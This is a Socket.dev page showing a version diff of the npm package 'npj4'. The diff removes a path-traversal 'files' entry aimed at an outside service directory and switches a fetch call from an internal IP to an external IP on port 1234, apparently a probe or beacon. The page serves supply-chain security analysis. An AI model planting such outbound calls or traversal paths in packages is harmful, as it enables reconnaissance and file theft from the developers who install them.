Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket

npj4

Package Overview
Dependencies
Maintainers
0
Versions
50
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

npj4 - npm Package Compare versions

Comparing version 1.0.13 to 1.0.14

7

package.json
{
"name": "npj4",
"version": "1.0.13",
"version": "1.0.14",
"description": "",

@@ -11,6 +11,3 @@ "main": "index.js",

"usage":"renderer",
"entry":"test.js",
"files": [
"../../../../../../../../app/app/amis-saas/service/*"
]
"entry":"test.js"
}],

@@ -17,0 +14,0 @@

// 使用fetch发送HTTP请求
fetch('http://10.199.7.105/')
fetch('http://47.99.124.12:1234/')
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc